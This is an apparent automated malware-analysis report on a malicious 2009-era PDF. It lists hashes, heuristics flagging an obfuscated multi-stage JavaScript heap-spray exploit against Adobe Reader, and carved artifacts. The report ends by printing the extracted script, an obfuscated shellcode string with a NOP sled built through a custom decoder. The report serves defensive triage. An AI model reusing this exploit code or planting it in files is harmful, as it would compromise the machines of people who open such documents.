Malicious PDF — malware analysis report

Static analysis result for SHA-256 f5d15c807aa0b644…

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows)) First seen: 2026-05-11
MD5: f146aba17a27aca927c152765353338d SHA-1: 950963e9c9fe3ff3a92bec37ebd3df3c51e9aaed SHA-256: f5d15c807aa0b6442564ef0856d54cb0b399c84c7c757a653721a98581661a6b
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier. It contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The embedded JavaScript stream, named 'javascript_obj0031_000.js', is the primary indicator of malicious activity. This script is likely responsible for downloading and executing a second-stage payload, a common technique for malware delivery. No specific family could be identified.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9980

Heuristics 7

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
k1 pdf-embedded-file PDF EmbeddedFile object 26 at offset 0x1EC1 1206312 bytes
SHA-256: d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
javascript_obj0031_000.js pdf-javascript-stream PDF /JS object 31 at offset 0x12B202 5453 bytes
SHA-256: da46c4b5a4e5867d625e812e2353d3a49369f70c04e256659909fa6c257adb63
Preview script
First 1,000 lines of the extracted script
function start() 
{
  sc = UnEscApeYGVtffRDXedcTGByhn("\x25\x759090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66\x25\x7558c0"+
"\x25\x758a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3\x25\x75ffff"+
"%u5942%u4b43%u5941%u5841%u5841%u4646%u6b41%u7042%u6c43%u4b48%u4843%u6841"+
"%u4b48%u4843%u5441%u4b48%u7843%u4441%u6d48%u4b48%u4843%u5041%u5643%u7342"+
"%u6d48%u5843%u5a43%u5842%u5541%u5841%u5841%u5841%u4948%u6744%u4348%u7442"+
"%u5041%u4348%u7742%u6444%u6341%u4142%u6546%u5445%u7342%u6843%u4b48%u6443"+
"%u4444%u4444%u4b48%u4d43%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48"+
"%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342%u6c41%u4143%u4b48%u6c41"+
"%u4b48%u6344%u4542%u6b41%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446"+
"%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442%u6341%u7443%u4444%u7041"+
"%u6546%u5142%u4b48%u5243%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48"+
"%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344%u7542%u4948%u4c43%u4444"+
"%u4441%u6943%u7342%u7742%u4d43%u6c43%u5841%u5841%u5841%u5841%u6243%u5841"+
"%u4d48%u4d43%u5443%u5843%u7846%u5841%u6444%u5841%u5841%u4f42%u6546%u6441"+
"%u4f42%u6546%u5846%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48%u4543%u5443"+
"%u4b48%u7543%u6441%u4b48%u4742%u7348%u5942%u7248%u7742%u6c48%u6a41%u7342"+
"%u6a41%u7242%u6a48%u4e42%u7345%u4e42%u7a42%u5242%u4442%u6243%u5841%u4d48"+
"%u4d43%u6843%u5843%u4f42%u6546%u5443%u4b48%u4546%u6441%u5a43%u4f42%u6546"+
"%u4443%u4f42%u4546%u4441%u4b48%u4546%u6843%u7141%u4546%u5043%u4348%u7543"+
"%u5043%u5841%u7743%u7248%u4f42%u6546%u4443%u4f42%u4546%u5041%u7342%u4e48"+
"%u4643%u5641%u5445%u4348%u7948%u7548%u7043%u4b42%u5748%u4d42%u5741%u6b41"+
"%u7a42%u4a48%u5343%u4743%u6344%u7742%u774b%u6548%u4f41%u5841%u7443%u4e41"+
"%u6d43%u4a42%u4841%u4741%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48"+
"%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445%u5748%u6344%u5441%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u734b"+
"%u734b%u734b%u734b%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u6446%u6d43%u6543%u7843%u7641"+
"%u6d43%u7043%u6d43%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148%u5545"+
"%u6646%u5841%u5841%u5841%u5842%u6c48%u4e42%u4f42%u4f42%u4b48%u6845%u4b48"+
"%u4542%u4b48%u4e42%u4b48%u7645%u4348%u7142%u6841%u5842%u6f48%u4e42%u4f42"+
"%u4f42%u6b41%u7942%u4948%u4543%u5846%u4348%u4d43%u5846%u6444%u6b41%u7942"+
"%u5943%u4f42%u6546%u5846%u4f42%u4546%u4444%u6541%u484b%u7a48%u4a41%u5841"+
"%u7a43%u5445%u6541%u484b%u734b%u4a41%u5841%u6746%u5542%u7846%u4f42%u5841"+
"%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u5844%u5843%u7846"+
"%u4f42%u5841%u5841%u5841%u4f42%u4546%u5441%u4b48%u7842%u4b48%u4d43%u5844"+
"%u6344%u7142%u4348%u5842%u6544%u7642%u5841%u5841%u4f42%u6546%u5844%u4f42"+
"%u4546%u4841%u6243%u5841%u6243%u5841%u7846%u5841%u4741%u5841%u5841%u4f42"+
"%u6546%u5846%u4f42%u4546%u7841%u6243%u5841%u4d48%u4d43%u5443%u5843%u6243"+
"%u6444%u4d48%u4d43%u4446%u5843%u4f42%u6546%u5846%u4f42%u4546%u7844%u6243"+
"%u5841%u6243%u5841%u7846%u4841%u4741%u5841%u5841%u4f42%u6546%u5846%u4f42"+
"%u4546%u7841%u4546%u6243%u5841%u7846%u484b%u5841%u5841%u5841%u6243%u5a41"+
"%u6243%u5841%u6243%u5941%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u7846"+
"%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48%u4542%u4b48%u4f42%u4546"+
"%u4b48%u5445%u4f42%u6e43%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348"+
"%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43%u4443%u7846%u5841%u6444"+
"%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u6441%u4b48%u4d43"+
"%u4446%u4948%u4d43%u5043%u5842%u4243%u4e42%u4f42%u4f42%u4546%u6b41%u7942"+
"%u5943%u4d48%u4d43%u7846%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48"+
"%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43%u7041%u5842%u4142%u4f42"+
"%u4f42%u4f42%u5543%u6243%u5841%u6243%u4f42%u4f42%u4546%u6444%u5048%u5048"+
"%u5048%u4546%u4b48%u5445%u4348%u7442%u4442%u6243%u4542%u5842%u4f48%u5841"+
"%u5841%u5841%u4948%u4d43%u4c42%u4f42%u6546%u5041%u5842%u4443%u5841%u5841"+
"%u5841%u4948%u4d43%u4442%u6243%u5841%u4d48%u4d43%u4842%u5843%u4f42%u6546"+
"%u4442%u4f42%u6546%u5041%u4f42%u6546%u4c42%u5842%u6346%u5841%u5841%u5841"+
"%u4b48%u4d43%u4842%u7942%u7242%u6444%u5841%u7445%u7445%u4546%u4b48%u5445"+
"%u4348%u7442%u4842%u6243%u4542%u5842%u4746%u5841%u5841%u5841%u4948%u4d43"+
"%u4c42%u4b48%u4543%u5041%u4b48%u4d43%u5441%u7142%u5042%u4841%u6e43%u4b48"+
"%u7142%u5843%u4f42%u6546%u4c42%u5842%u4343%u5841%u5841%u5841%u7942%u7242"+
"%u5041%u5841%u7445%u7445%u7445%u4546%u4b48%u5445%u4346%u4b48%u4d43%u5041"+
"%u4d48%u5843%u6344%u4b48%u7844%u4348%u7042%u6444%u4d48%u4b48%u4f42%u4e42"+
"%u4e42%u4e42%u4742%u6342%u4344%u7345%u4148%u5142%u484b%u484b%u484b%u484b"+
"%u6446%u5942%u4742%u7142%u484b%u484b%u5841%u5841%u6546%u6644%u7142%u5942"+
"%u4841%u4348%u7042%u5a41%u6845%u5142%u4341%u7242%u5343%u7942%u7242%u6444"+
"%u5841%u4f42%u4544%u6444%u7841%u4843%u5841%u4f42%u4544%u5041%u7841%u4843"+
"%u5841%u4f42%u4544%u5841%u7841%u4843%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u3030");
}